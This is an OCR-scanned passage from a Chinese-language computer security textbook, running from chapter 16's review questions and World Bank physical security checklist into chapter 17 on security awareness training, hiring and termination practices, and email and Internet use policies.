FEMA97 Federal Emergency Management Administration. Multihazard Identification 
and Risk Assessment. FEMA Publication 9-0350, 1997. 

NIST9S National Institute of Standards and Technology. An Introduction to Computer 
Security: The NIST Handbook. Special Publication 800-12. October 1995. 

SADO03 Sadowsky, G. et al. Information Technology Security Handbook. Washington, 
DC: The World Bank, 2003, http://www.infodev-security.net/handbook 

SZUB98 Szuba, T. Safeguarding Your Technology. National Center for Edu- 
cation Statistics, NCES 98-297, 1998, http://www.nces.ed.gov/pubsearch/ 
pubsinfo.asp? pubid=98297 


16.8 ”关键 术语 、 复 习题 和 习题 


corporate security (公司 安全 ) l noise (I) 

environmental threats (环境 威胁 ) overvoltage (过 电压 ) 

facilities security (设备 安全 ) personal identity verification (PIV， 个 人 身份 验证 ) 
infrastructure security (基础 设施 安全 ) physical access control system ( PACS， 物 理 访问 控 


logical security (逻辑 安全 ) 制 系统 ) 
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physical security (物理 安全 ) 


technical threats (技术 威胁 ) 


premises security (整体 安全 ) undervoltage ( 欠 电 压 ) 
复习 题 

16.1 对 于 不 合适 的 温度 和 湿度 ， 主 要 考虑 的 问题 是 什么 ? 

16.2 ”火灾 造成 的 直接 和 间接 的 威胁 是 什么 ? 

16.3” 断 电 造 成 的 威胁 是 什么 ? 


16.4 
16.5 
16.6 
16.7 


列 出 并 描述 一 些 处 理 不 合适 的 温度 和 湿度 的 方法 。 
列 出 并 描述 对 火灾 的 一 些 处 理 措施 。 

列 出 并 描述 对 水 的 损害 的 一 些 处 理 措施 。 

列 出 并 描述 对 电力 损失 的 一 些 处 理 措施 。 


习题 


16.1 


16.2 
16.3 
16.4 


表 16-7 是 从 世界 银行 出 版 的 技术 风险 检查 清单 (Technology Risk Checklist) 中 抽取 的 ， 该 清单 用 来 
给 金融 机 构 和 其 他 机 构 提 供 指导 。 这 里 抽取 的 是 物理 安全 检查 清单 部 分 。 比 较 这 个 安全 策略 和 附 
R H.1 给 出 的 策略 。 看 看 有 什么 重合 和 不 同 的 部 分 。 


表 16-7 ”世界 银行 的 物理 安全 检查 清单 


54. 你 们 的 安全 策略 对 网 络 化 系统 设备 的 物理 访问 进行 限制 了 吗 ? 

55. 为 了 阻止 非 授权 访问 ， 你 们 的 物理 访问 控制 使 用 了 生物 特征 认证 或 者 智能 卡 认证 吗 ? 
56. 有 人 定期 检查 密 钥 卡 访问 系统 的 审计 记录 吗 ? 这 里 是 否 记 录 了 登录 失败 发 生 的 次 数 ? 
57. 软件 的 备用 拷贝 是 保存 在 一 个 安全 的 地 方 吗 ? 

58. 你 们 的 设备 在 所 有 的 时 间 里 都 安全 地 上 锁 了 吗 ? 

59. 你 们 的 网 络 设施 有 监控 器 或 者 监控 系统 来 追踪 异常 活动 吗 ? 

60. 所 有 不 用 的 “端口 ”都 关闭 了 吗 ? 

61. 你 们 的 设备 配备 警报 器 了 吗 ? 这 些 警报 器 应 该 通知 对 系统 房间 和 设施 的 可 疑 人 侵 。 
62. 在 所 有 的 敏感 地 区 附近 都 布置 摄像 机 了 吗 ? . 

63. 你 们 有 完全 自动 的 灭火 系统 吗 ? 这 个 系统 在 检测 到 热 、 烟 和 灰尘 的 时 候 能 够 自动 激活 。 
64. 你 们 有 自动 的 湿度 控制 器 吗 ? 它 能 防止 出 现 损 坏 设备 的 过 湿 的 环境 。 

65. 你 们 安装 自动 电压 控制 设备 来 保护 IT 资产 了 吗 ? 

66. 在 敏感 区 域 是 否 对 屋顶 加 强 了 防御 呢 (比如 说 服务 器 房间 ) ? 


有 没有 在 表 16-7 或 附录 H.1 中 提 到 ， 而 没有 在 本 章 中 论述 的 问题 ?如 果 有 ， 讨 论 它们 的 重要 性 。 
有 没有 在 本 章 中 提 到 的 问题 而 在 图 16-3 中 没有 涉及 ?如 果 有 ， 讨 论 它们 的 重要 性 。 
使 用 简洁 的 描述 将 下 面 的 表格 填写 完整 。 


IT 安全 物理 安全 
边界 类 型 (由 什么 组 成 的 边界 ) 
标准 
完备 
攻击 频率 
攻击 响应 (响应 类 型 ) 
攻击 者 的 风险 
危害 的 证 据 
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人 力 资源 安全 


学 习 目标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

© 描述 安全 意识 、 培 训 和 教育 过 程 的 益处 ; 
© 概述 雇用 实践 和 策略 ; 


© 讨论 电子 邮件 和 Internet 使 用 策略 的 要 求 ， 并 且 提 供 制定 这 些 策略 的 指导 方针 ; 
© 解释 计算 机 安全 事件 响应 团队 的 作用 ; 
© 描述 计算 机 安全 事件 响应 涉及 的 主要 步骤 。 


这 一 章 覆 盖 了 大 量 的 主题 ， 用 一 个 更 恰当 的 术语 描述 ， 就 是 人 力 资源 安全 。 这 是 一 个 广泛 
的 课题 ， 对 这 一 主题 的 全 面 讨论 已 远 远 超出 了 本 书 的 范围 。 在 这 一 章 ， 我 们 仅仅 讨论 这 一 领域 
的 一 些 重 要 的 内 容 。 


17.1 安全 意识 、 培 训 和 教育 


安全 意识 、 培 训 和 教育 这 一 主题 在 许多 标准 和 与 标准 相关 的 文档 中 都 被 重点 提 到 过 ， 这 些 
标准 和 文档 包括 ISO 27002 (信息 安全 管理 实施 细则 ) A NIST 特别 报告 书 (Special Publication, 
SP) 800-100 (信息 安全 手册 : 管理 者 指南 )。 本 节 将 对 这 一 主题 做 一 个 概括 的 介绍 。 


17.1.1 动机 


安全 意识 、 培 训 和 教育 项 目 能 够 为 组 织 提供 以 下 4 个 方面 的 益处 : 

e 改善 员工 的 行为 。 

。 提升 员工 为 自己 的 行为 负责 的 能 力 。 

© 减轻 组 织 为 员工 的 行为 所 负 的 责任 。 

e 遵守 法 规 和 合同 的 义务 。 

员工 行为 (employee behavior) 是 保证 计算 机 系统 和 信息 资产 安全 的 一 个 重要 方面 。 最 近 
的 一 些 调查 表明 ， 包 括 恶意 和 无 意 在 内 的 员工 行为 ， 都 会 造成 相当 大 的 与 计算 机 有 关 的 损失 和 
安全 威胁 (如 [CSI10]、[VERI113])。 员 工行 为 的 最 主要 问题 是 错误 和 遗漏、 欺骗 ， 以 及 有 不 满 
情绪 的 员工 的 活动 。 安 全 意识 、 培 训 和 教育 项 目 能 够 减少 由 错误 和 遗漏 带 来 的 问题 。 

这 些 程序 通过 强化 员工 的 责任 意识 ， 增 加 应 有 的 处 罚 措施 ， 对 进行 欺骗 或 者 发 泄 不 满 的 员 
工 的 活动 形成 一 定 的 威慑 。 组 织 不 要 期 望 员工 遵循 他 们 所 不 知 的 策略 或 者 程序 行事 。 进 一 步 地 
说 ， 当 发 现 员工 违反 组 织 的 规定 时 ， 如 果 员 工 声称 对 政策 或 程序 毫 不 知情 ， 执 行 强制 措施 将 会 
变 得 相当 困难 。 

正在 进行 的 安全 意识 、 培 训 和 教育 项 目 对 限制 组 织 的 责任 也 很 重要 。 这 些 项 目 可 以 对 组 织 
在 保护 信息 方面 已 经 采取 的 谨慎 措施 给 予 支持 。 

最 后 ， 安 全 意识 、 培 训 和 教育 项 目 在 遵守 法 规 与 合同 的 义务 方面 会 很 有 用 。 例 如 ， 有 权 
使 用 客户 信息 的 公司 需 具 有 特别 的 意识 和 培训 责任 ， 以 此 来 约束 能 够 接触 客户 数据 的 员工 的 
行为 。 
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17.1.2 ”学 习 的 持续 性 


许多 NIST 的 文档 以 及 ISO 27002 的 文档 都 意识 到 ， 对 于 一 个 与 安全 相关 的 员工 ， 学 习 的 
目标 依赖 于 员工 所 处 的 角色 。 因 此 就 需要 一 个 持续 的 学 习 计划 ， 从 增强 意识 开始 ， 进 而 培训 安 
全 技能 ， 并 逐渐 上 升 到 安全 教育 。 图 17-1 给 出 了 一 个 模型 ， 说 明了 在 一 个 包含 数据 和 设备 的 
信息 系统 中 ， 具 有 不 同 责任 和 角色 的 员工 所 需要 的 学 习 内 容 。 在 这 个 模型 的 底部 ， 所 有 的 员工 
都 需要 意识 到 安全 的 重要 性 ， 同 时 员工 也 要 对 策略 、 工 作 程 序 和 制度 有 一 个 大 致 的 理解 。 模 型 
的 中 间 两 层 为 培训 。 培 训 是 针对 使 用 IT 系统 和 数据 的 人 员 的 ， 他 们 需要 对 IT 安全 威胁 、 系 统 
漏洞 、 安 全 防护 措施 有 深入 的 了 解 。 模 型 的 最 高 层 主要 针对 IT 系统 中 的 核心 人 员 ， 例 如 程序 
员 、 维 护 和 管理 IS 设备 的 人 员 ， 以 及 负责 IS 安全 的 人 员 。 





图 17-1 信息 技术 (OT) 持续 性 学 习 


NIST SP 800-16 (信息 技术 安全 培训 要 求 : 基于 角色 和 性 能 的 模型 ) 总 结 为 如 下 4 层 : 

e 安全 意识 ( Security Awareness) 显然 是 所 有 员工 应 该 具备 的 ， 而 那些 与 IT 系统 有 关 的 
员工 则 要 求 具 备 更 多 的 安全 基础 知识 和 素养 。 在 当前 的 环境 下 ， 组 织 内 几乎 所 有 的 人 
都 需要 具备 后 面 提 到 的 安全 基础 知识 和 素养 。 

e 安全 基础 知识 和 素养 (Security Basics and Literacy) 是 安全 意识 和 培训 之 间 的 过 渡 阶 段 。 
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它 提 供 了 一 个 有 关 关 键 安 全 术语 和 概念 的 通用 基线 ， 从 而 为 后 续 的 培训 提供 了 基础 。 
e 在 安全 基础 知识 和 素养 的 培训 之 后 ， 培 训 的 重点 开始 集中 在 针对 与 IT 系统 相关 的 职能 
人 员 和 责任 人 (Functional Role and Responsibility Relative to IT System) 提供 相应 的 知 
识 、 技 巧 和 能 力 。 在 这 一 层 ， 培 训 需 要 分 清 初级 、 中 级 、 高 级 之 间 不 同 的 技能 要 求 。 
e 教育 和 经 验 层 把 重点 集中 在 发 展 员工 对 比较 复杂 、 多 学 科 的 问题 的 解决 能 力 ， 拓 展 员 
工 的 视野 ， 深 入 学 习 IT 安全 专业 知识 所 需要 的 技巧 ， 以 及 跟 上 安全 威胁 和 技术 变化 的 





步伐 。 
表 17-1 说 明了 意识 、 培 训 和 教育 之 间 的 一 些 差别 。 下 面 我 们 就 逐一 探讨 。 
表 17-1 比较 框架 
a S 
mit “为 什么 ” 
级 别 洞察 力 
目标 理解 
i 理论 教学 
教授 方法 一 研讨 会 讨论 
一 阅读 背景 知识 
判断 对 / 错 — 
测试 方法 多 项 选择 ae anek 
( 找 出 学 到 的 知识 ) l l 
KANA 长 期 
17.1.3 ”意识 


一 般 来 说 ,增强 安全 意识 的 目的 在 于 告知 员工 并 使 其 将 注意 力 集中 在 组 织 内 部 的 安全 问题 
E. 增强 安 全 意识 有 望 得 到 以 下 几 个 方面 的 益处 : 

1. 使 员工 意识 到 他 们 对 维护 安全 的 责任 及 为 了 安全 需要 约束 他 们 的 行为 ， 并 依 此 开展 
工作 。 

2. 使 用 户 懂得 安全 对 于 一 个 组 织 健康 运作 的 重要 性 。 

3. 因为 不 断 出 现 的 新 威胁 所 造成 的 阻碍 ， 所 以 客户 的 支持 、IT 员工 的 热情 和 引进 的 管理 
是 很 关键 的 ， 并 且 可 以 通过 安全 意识 项 目 得 以 提升 。 

增强 安全 意识 项 目的 内 容 必须 适应 组 织 的 需求 ， 并 适应 所 培训 的 人 群 。 这 些 人 群 不 仅 包 
括 经 理 、IT 专业 人 员 及 IS 用 户 ,还 包括 与 信息 系统 稍 有 联系 甚至 没有 联系 的 员工 。NIST SP 
800-100〈 信 息 安全 手册 : 管理 者 指南 ) 描述 了 安全 意识 项 目的 内 容 ， 概 括 如 下 : 


安全 意识 工具 是 用 来 提升 信息 安全 的 ， 并 通过 解释 什么 是 安全 的 而 不 是 怎样 才 安 全 ， 以 
及 哪些 是 允许 传送 的 和 哪些 是 不 允许 传送 的 ， 来 告知 用 户 那 些 影响 他 们 公司 (或 部 门 ) 和 个 人 
工作 环境 的 安全 威胁 和 漏洞 。 安 全 意识 不 仅 传达 了 信息 安全 所 要 遵循 的 策略 和 程序 ， 而 且 也 为 
制裁 和 惩罚 违规 行为 提供 了 基础 。 安 全 意识 被 用 来 解释 使 用 公众 服务 机 构 的 信息 系统 和 信息 的 
行为 规则 ， 并 建立 了 信息 和 信息 系统 的 可 接受 使 用 的 期 望 级 别 。 


安全 意识 训练 项 目 必须 不 断 地 以 各 种 方式 向 员工 宣传 安全 知识 。 这 类 训练 可 以 通过 开展 各 
种 各 样 的 活动 和 使 用 题材 广泛 的 资料 进行 宣传 。 包 括 使 用 宣传 资料 (如 海报 、 备 忘 录 、 实 时 通 
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信和 传单 等 )， 详 细 地 介绍 安全 策略 和 相关 法 案 的 关键 方面 和 内 容 ， 日 积 月 累 地 提高 员工 的 安 
全 意识 ; 也 包括 为 员工 组 织 提供 所 需 信 息 的 各 种 研讨 会 和 培训 会 议 。 这 些 通常 可 能 被 纳入 有 关 
组 织 实践 和 系统 的 培训 程序 中 。 一 些 标准 鼓励 使 用 与 组 织 的 系统 和 信息 技术 相关 的 良好 实践 的 
实例 。 越 是 相关 和 易于 效仿 的 规程 ， 越 是 可 能 易于 依照 其 执行 并 达到 安全 。 合 适 的 安全 意识 研 
讨 会 也 应 纳入 向 组 织 介 绍 新 员工 的 环节 。 应 当 定 期 举行 安全 意识 研讨 会 以 帮助 员工 更 新 安全 知 
识 和 了 解 新 的 安全 问题 。 

[SZUB98] 提供 了 一 个 有 用 的 安全 意识 项 目的 目标 列表 ， 如 下 所 示 : 

目标 1: 全 面 提 升 员工 对 信息 技术 安全 问题 的 认识 。 

目标 2: 确保 员工 了 解 当 地 、 州 、 联 邦 政府 关于 保密 和 安全 的 政策 法 规 。 

目标 3: 解释 说 明 机 构 的 安全 策略 和 实施 程序 。 

目标 4: 使 员工 懂得 安全 需要 团队 的 努力 ， 要 实现 安全 目标 每 个 人 都 很 重要 。 

目标 5: 通过 培训 使 员工 能 够 承担 他 们 的 工作 岗位 所 具有 的 特殊 的 安全 责任 。 

目标 6: 告知 员工 安全 活动 会 被 监视 。 

目标 7: 提醒 员工 ， 违 反 安全 规则 应 承担 责任 。 

目标 8 : 使 员工 知道 报告 潜在 的 或 已 经 发 生 的 安全 事故 和 漏洞 是 负责 的 行为 而 且 是 有 必要 

的 (而 不 是 捣乱 闲事 的 行为 )。 

目标 9: 使 员工 相信 建立 一 个 可 信和 的 系统 是 可 以 实现 的 。 

为 巩固 对 安全 重要 性 的 认识 ， 机 构 应 该 向 每 个 员工 提供 一 份 安全 意识 的 策略 文档 。 该 文档 
应 该 确立 下 列 三 件 事 : | 

1. 要 求 所 有 员工 都 参与 到 加 强 安 全 意识 的 项 目 中 ,包括 针 对 新 员工 的 介绍 性 项 目 和 定期 举 
办 的 增强 安全 意识 的 活动 。 

2. 要 给 予 每 个 人 充足 的 时 间 ， 使 其 参与 到 增强 安全 意识 的 活动 中 。 

3. 明确 说 明 管 理 和 举办 增强 安全 意识 活动 的 责任 。 

信息 安全 论坛 (Information Security Forum) [ISF13] 中 ,《 信 息 安 全 的 良好 实践 标准 》( The 
Standard of Good Practice for Information Security) 提供 了 一 个 全 面 的 、 详 细 的 安全 意识 所 需 考 
虑 事项 的 列表 。 这 些 材 料 被 重 现在 附录 H.3 中 。 


17.1.4 培训 


一 个 安全 培训 项 目 ， 其 设计 目标 是 教会 人 们 如 何 更 加 安全 地 从 事 与 信 息 系统 相关 的 工作 。 
培训 教会 人 们 应 该 做 什么 ， 应 该 怎么 做 。 根 据 每 个 使 用 者 的 角色 不 同 ， 培 训 也 涵盖 了 从 基本 的 
电脑 技巧 到 高 级 的 特殊 技巧 各 个 层次 的 内 容 。 

对 于 一 般 的 用 户 ， 培 训 集中 于 良好 的 计算 机 安全 实践 ， 包 含 以 下 内 容 : 

e 保护 设备 和 设备 所 在 的 物理 区 域 (例如 ， 锁 上 门 ， 保 管 好 CD-ROM fil DVD). 

o 保护 好 口令 (如 果 有 的 话 ) 或 者 其 他 的 认证 数据 或 令 牌 (例如 从 不 泄露 PIN)。 

© 报告 安全 违规 行为 或 事件 (例如 ， 如 果 怀 疑 是 病毒 ， 应 该 向 谁 求助 )。 

程序 员 、 开 发 者 和 系统 维护 者 需要 接受 更 加 特别 或 高 级 的 培训 。 这 一 类 员工 对 于 建立 和 维 
护 计算 机 安全 特别 重要 。 尽 管 如 此 ， 很 少 有 程序 员 或 者 开发 者 懂得 如 何 对 他 们 开发 或 者 维护 的 
软件 进行 安全 防护 。 通 常 开发 者 不 会 把 安全 机 制 加 到 他 们 的 程序 中 ， 或 者 他 们 不 知道 怎么 增加 
安全 机 制 ， 有 时 他 们 甚至 抵制 安全 专家 的 批评 。 为 这 一 类 人 设置 的 培训 内 容 应 该 包含 如 下 几 个 
方面 : 

© 培养 开发 人 员 的 安全 意识 。 

。 使 用 定义 明确 的 检查 点 ， 向 开发 人 员 展 示 怎样 将 安全 机 制 添 加 到 开发 生命 周期 中 。 
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e 使 开发 人 员 清 楚 攻击 者 是 如 何 利用 软件 进行 攻击 的 ， 并 教会 他 们 如 何 防御 攻击 。 

e 为 分 析 员 提供 一 个 包括 特定 攻击 和 原理 的 工具 包 ， 使 用 它 来 检测 系统 。 

管理 层 (management-level) 培训 应 该 教会 软件 开发 管理 人 员 在 面临 与 安全 相关 的 风险 、 成 
本 和 利益 时 怎样 做 出 权衡 。 管 理 人 员 需 要 理解 开发 周期 并 使 用 安全 检查 点 和 安全 评估 技术 。 

行政 层 ( executive-level) 培训 必须 解释 软件 安全 和 网 络 安全 的 区 别 ， 特 别 是 软件 安全 事件 
的 普遍 性 。 行 政 人 员 需 要 培养 对 安全 风险 和 成 本 的 理解 。 这 类 人 员 需 要 在 以 下 几 个 方面 接受 培 
Vil: 风险 管理 的 目标 、 风 险 测量 的 方法 、 在 安全 意识 方面 以 身 作 则 为 员工 树立 典范 。 


17.1.5 教育 


最 为 全 面 和 深入 的 项 目 是 安全 教育 。 安 全 教育 面向 的 人 群 是 安全 专业 人 员 和 在 工作 中 需要 
专门 安全 技术 的 人 员 。 通 常 ， 在 大 多 数组 织 的 安全 意识 和 培训 项 目 中 不 包括 安全 教育 。 安 全 教 
育 更 适合 于 作为 员工 职业 发 展 项 目 。 通 常情 况 下 ， 这 种 类 型 的 教育 是 由 外 部 资源 (例如 大 学 课 
程 ) 或 者 特殊 的 培训 项 目 提 供 的 。 


17.2 雇用 实践 和 策略 


本 节 讨论 员工 的 安全 问题 ,包含 招聘 、 培 训 、 监 视 行 为 和 处 理 离职 事务 。[SADO03] 报道 
说 ， 大 部 分 重大 计算 机 案件 的 作案 人 员 都 是 能 够 合法 访问 或 者 最 近 合法 访问 过 的 个 人 。 因 此 ， 
管理 拥有 隐 含 访问 权 的 个 人 是 信息 安全 的 一 个 重要 部 分 。 

员工 能 够 通过 两 种 方式 参与 安全 违规 事件 。 有 些 员工 不 经 意 地 卷 人 了 安全 违规 事件 ， 主 要 
的 方式 有 : 没有 遵循 合理 的 程序 ， 忘 记 安 全 方面 的 注意 事项 ， 或 者 没有 意识 到 他 们 正在 制造 一 
个 漏洞 。 有 些 员工 有 意识 地 违反 控制 措施 或 实施 程序 去 制造 或 者 助长 安全 违规 事件 。 

来 自 内 部 员工 的 威胁 主要 包含 : 

© 获得 非 授权 的 访问 或 者 帮助 他 人 获得 非 授权 的 访问 。 

e 修改 数据 。 

© 删除 生产 和 备份 数据 。 

© 使 系统 崩溃 。 

© 毁坏 系统 。 

© 为 了 个 人 利益 或 为 了 破坏 机 构 而 滥用 系统 。 

© 持 有 作为 要 挟 条 件 的 数据 。 

o 为 商业 间谍 活动 或 欺诈 计划 盗 取 战 略 数据 或 用 户 数据 。 


17.2.1 招聘 过 程 的 安全 


ISO 27002 列举 了 在 招聘 过 程 中 的 安全 目标 : 确保 员工 、 承 包 商 和 第 三 方 用 户 清楚 他 们 的 
责任 ， 确 保 为 他 们 所 考虑 的 角色 是 合适 的 ， 并 且 减 少 偷 穷 、 欺 骗 和 设备 误 用 的 风险 。 虽 然 在 这 
一 节 我 们 主要 关注 的 是 员工 ， 但 是 ， 也 需要 对 承包 商 和 第 三 方 用 户 进行 同样 的 考虑 。 

背景 审查 和 考察 ”从 安全 的 角度 来 考虑 ， 招 聘 行为 给 管理 带 来 巨大 的 挑战 。[KABA14] 指 
出 越 来 越 多 的 证 据 证 明 ， 许 多 人 用 毫 无 依据 的 言辞 来 夸大 他 们 的 简历 。 前 任 雇主 的 沉默 态度 使 
这 种 问题 越 来 越 复杂 。 雇 主 在 面 对 无 竞争 力 的 人 、 表 现 不 佳 或 者 缺乏 职业 道德 的 人 时 给 出 不 好 
的 评价 可 能 会 比较 犹豫 ， 因 为 雇主 害怕 他 们 的 评论 被 公众 知道 后 会 遭 到 员工 控诉 或 者 导致 员工 
无 法 找到 新 的 工作 。 另 一 方面 ， 前 任 雇主 如 果 对 一 个 员工 给 予 了 良好 的 评价 ， 但 该 员工 在 接 下 
来 的 岗位 中 出 了 问题 ， 前 任 雇主 可 能 会 遭 到 新 雇主 的 指控 。 因 此 ， 许 多 雇主 之 间 达 成 了 一 个 默 
R: 绝对 不 以 任何 形式 讨论 前 员工 在 工作 中 的 表现 ， 无 论 是 肯定 的 还 是 否定 的 评价 。 和 雇主 也 会 
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限制 雇用 时 间 和 职位 信息 的 泄露 。 
尽管 存在 这 些 障碍 ， 雇 主 必须 尽 最 大 的 努力 对 申请 人 进行 背景 审查 和 考察 。 当 然 ， 这 些 考 
察 是 为 了 确保 未 来 的 员工 能 胜任 计划 中 的 工作 ， 并 且 没 有 安全 风险 。 另 外 ， 雇 主 需 要 了 解 在 一 
些 司法 权 中 “随意 雇用 ”的 概念 。 因 此 ， 如 果 员工 对 第 三 方 (个 人 或 者 公司 ) ERME, EE 
就 可 能 因为 “随意 雇用 ”而 负 法 律 责任 。 
审查 申请 人 的 一 般 指导 原则 ， 包 括 以 下 几 个 方面 : 
e 尽 可 能 详尽 地 询问 申请 人 的 工作 经 历 和 教育 经 历 。 询 问 到 的 细节 越 多 ， 申 请 人 如 果 说 
议 ， 则 保持 说 话 前 后 一 致 性 的 难度 越 大 。 
o 尽 可 能 理性 地 分 析 细 节 的 真实 性 。 
e 安排 有 经 验 的 员工 面试 候选 人 ， 讨 论 其 中 形成 的 差异 。 
对 于 高 度 敏感 的 职位 ， 需 要 更 加 精细 的 调查 。[SADO03] 给 出 了 下 面 的 例子 来 说 明 在 一 些 
环境 中 哪些 东西 需要 得 到 保证 : 
。 聘请 调查 代理 机 构 做 背景 审查 。 
© 检查 个 人 的 犯罪 记录 。 
。 检查 申请 人 的 信用 卡 记 录 ， 检 查 是 否 有 大 笔 个 人 债务 并 且 无 力 支付 。 如 果 你 发 现 这 样 
的 记录 ， 就 跟 申 请 人 讨论 其 中 的 问题 。 一 般 ， 处 于 债务 中 的 人 不 应 该 被 拒绝 ， 如 果 他 
们 被 拒绝 ， 他 们 将 无 力 获得 偿付 能 力 。 同 时 应 该 注意 ， 生 活 持 据 的 员工 更 可 能 有 不 合 
适 的 举动 。 
。 考虑 对 申请 人 进行 测 谎 (如 果 合 法 的 话 )。 虽 然 测 谎 仪 测试 并 不 总 是 精确 的 ， 但 如 果 你 
正在 为 一 个 特别 重要 的 职位 招聘 员工 ， 这 种 测试 还 是 很 有 帮助 的 。 
。 让 申请 人 明确 他 或 者 她 的 职位 的 权限 范围 。 
对 于 许多 员工 来 说 ， 这 些 步骤 是 多 余 的 。 尽 管 如 此 ， 雇 主 需要 对 将 要 处 于 信任 职位 或 者 具 
有 访问 特权 的 员工 进行 额外 的 检查 一 一 包含 维修 和 清洁 人 员 。 
雇用 协议 ”作为 合同 义务 的 一 部 分 ， 员 工 应 该 同意 雇用 协议 上 有 关 他 们 和 机 构 的 信息 安全 
责任 的 条 款 并 签名 。 该 雇用 协议 应 该 包括 保密 和 不 可 公开 协议 ， 这 个 协议 详细 说 明 机 构 的 信息 
资产 是 机 密 的 ， 除 非 以 其 他 的 方式 指明 不 是 机 密 信 息 ， 并 且 员 工 应 该 保护 这 些 机 密 。 雇 用 协议 
也 应 该 参考 机 构 的 安全 策略 ， 并 表明 员工 已 经 知道 并 且 同 意 遵守 该 策略 。 


17.2.2 雇用 期 间 的 安全 


ISO 27002 对 当前 的 员工 列举 出 以 下 的 安全 目标 : 确保 员工 、 承 包 商 和 第 三 方 用 户 能 够 意 
识 到 信息 安全 的 威胁 ， 明 确 他 们 在 维护 信息 安全 过 程 中 的 责任 ， 在 日 常 工作 中 遵守 机 构 的 安全 
规则 ,减少 人 为 的 玖 漏 所 造成 的 风险 。 
在 雇用 期 间 ， 有 关 人 员 安 全 的 两 个 重要 因素 是 ， 全 面 的 安全 策略 文档 和 对 所 有 员工 正在 进 
行 的 安全 意识 与 培训 项 目 。17.1 节 和 17.2 节 将 讲述 这 些 内 容 。 
除了 以 一 致 和 公平 的 方式 加 强 安全 策略 之 外 ， 对 于 人 员 安 全 需要 遵循 以 下 一 些 原则 : 
o 最 小 特权 (least privilege): 根据 员工 所 做 的 工作 给 予 他 最 小 的 访问 权限 。 这 种 受 限 制 
的 访问 既 包 含 逻辑 方面 的 (账号 、 网 络 和 程序 的 访问 )， 也 包含 物理 方面 的 (计算 机 、 
备份 磁带 和 其 他 外 部 设备 的 访问 )。 如 果 每 个 用 户 都 能 访问 所 有 的 系统 并 且 能 够 与 任何 
设备 进行 物理 连接 ， 这 样 所 有 的 员工 在 威胁 的 级 别 上 就 基本 一 样 了 。 
© 责任 划分 (separation of duty): 对 责任 进行 仔细 的 划分 ， 这 样 才能 够 使 那些 负责 检查 不 
合理 使 用 的 职员 减少 自己 不 恰当 使 用 的 机 会 。 因 此 ， 把 所 有 安全 和 审计 责任 放 在 一 个 
人 身上 是 危险 的 。 这 种 实践 会 导致 这 样 一 种 情况 : 这 个 人 违反 了 安全 策略 或 者 执行 了 
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被 禁止 的 行为 ， 但 是 没有 人 来 查看 审计 并 进行 警示 。 

e 对 关键 员工 有 限 的 依赖 (limited reliance on key employee): 在 一 个 机 构 中 没有 人 
是 不 可 替代 的 。 如 果 你 的 机 构 依 靠 一 个 关键 员工 在 开展 工作 ， 那 么 你 的 机 构 就 有 风 
险 了 。 机 构 不 可 能 没有 关键 员工 。 但 为 了 安全 ， 机 构 必 须 考虑 到 该 关键 员工 出 现 不 
可 预料 的 疾病 或 者 离职 的 情况 ， 要 为 此 预先 制定 安全 策略 和 计划 。 对 于 系统 来 说 ， 
在 员工 的 结构 中 应 该 建立 一 定 的 宛 余 机 制 。 专 门 技能 或 者 专门 知识 不 能 仅 由 一 人 
掌握 。 


172.3 ”员工 离职 过 程 的 安全 


ISO 27002 对 于 员工 的 离职 列举 了 以 下 的 安全 目标 : 确保 员工 、 承 包 商 和 第 三 方 用 户 能 够 
以 规定 的 方式 离开 机 构 或 者 改变 职位 ， 返 还 机 构 所 有 的 设备 并 撤销 其 访问 权限 。 

离职 的 过 程 很 复杂 ， 主 要 受 机 构 的 性 质 、 员 工 在 机 构 中 的 地 位 、 离 职 的 原因 等 因素 的 影 
响 。 从 安全 角度 来 说 ， 以 下 的 措施 是 很 重要 的 : 

© 将 这 个 人 名 字 从 所 有 授权 访问 列表 中 清除 。 

e 明确 地 通知 保安 ， 离 职 的 员工 在 没有 正式 员工 的 特别 授权 下 不 许 进 入 办 公 区 域 。 

。 清除 离职 人 员 的 所 有 访问 代码 。 
如 果 必 要 ， 改 变 锁 的 组 合 方式 ， 重 写 访 问 卡 系统 的 程序 ， 更 换 物 理 锁 。 
收回 机 构 所 有 的 资产 ， 包 含 员 工 ID 、 硬 盘 、 文 档 和 设备 。 
用 便签 或 电子 邮件 的 方式 告知 适当 的 部 门 。 


17.3 ”电子 邮件 和 Internet 使 用 策略 


在 办 公 环 境 中 ， 为 绝 大 多 数 甚 至 所 有 员工 提供 电子 邮件 和 Internet 服务 是 很 常见 的 。 同 时 
在 其 他 环境 中 也 会 有 选择 地 给 部 分 员工 提供 这 些 服务 ， 比 如 工厂 员工 。 越 来 越 多 的 公司 法 人 把 
电子 邮件 和 Internet 使 用 策略 加 入 到 机 构 安全 策略 文档 中 。 本 节 我 们 讨论 制定 这 些 策略 应 该 考 
虑 的 问题 。 


17.3.1 动机 


员工 广泛 地 使 用 电子 邮件 和 Intemet， 引 起 了 雇主 对 员工 的 一 些 关 注 ， 主 要 涉及 以 下 几 个 
方面 : 

1. 在 明确 规定 的 工作 时 间 ， 员 工 可 能 从 事 与 工 作 无 关 的 活动 ， 比 如 ， 网 上 冲浪 、 网 上 游 
戏 、 网 上 购物 、 网 上 聊天 和 网 上 收发 个 人 电子 邮件 。 

2. 使 用 重要 的 计算 机 和 通信 资源 从 事 与 工 作 无 关 的 活动 ， 使 信息 安全 资源 原来 的 设计 能 力 
大 打折 扣 。 

3. 过 多 地 和 随意 地 使 用 Internet 和 电子 邮件 ， 会 不 必要 地 增加 恶意 软件 进入 机 构 IS 环境 的 
风险 。 

4. 员工 从 事 与 工 作 无 关 的 活动 可 能 会 对 机 构 外 的 机 构 和 个 人 有 害 ， 因 此 使 机 构 承担 责任 。 

5. 电子 邮件 和 Internet 可 能 会 被 员工 用 来 骚扰 其 他 员工 。 

6. 员工 不 适当 的 在 线 活 动 可 能 损毁 机 构 的 声誉 。 


17.3.2 策略 问题 


开发 一 个 完善 的 电子 邮件 和 Internet 使 用 策略 会 导致 许多 策略 问题 。 以 下 是 基于 [KING06] 
的 一 些 策略 建议 。 
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e 仅 供 业 务 使 用 (business use only): 员工 只 有 在 执行 公司 事务 时 ， 才 能 使 用 公司 提供 的 
电子 邮件 和 Internet 服务 。 
e 策略 范围 (policy scope): 策略 涉及 电子 邮件 访问 、 电 子 邮件 信息 内 容 、Internet 和 企业 
内 部 网 通信 ， 以 及 电子 邮件 、Internet 和 企业 内 网 通信 的 记录 。 
e 内 容 所 有 权 (content ownership): 电子 通信 设备 、 文 件 、 数 据 是 公司 的 财产 ， 即 使 该 文 
件 或 者 数据 传送 到 公司 外 的 设备 。 
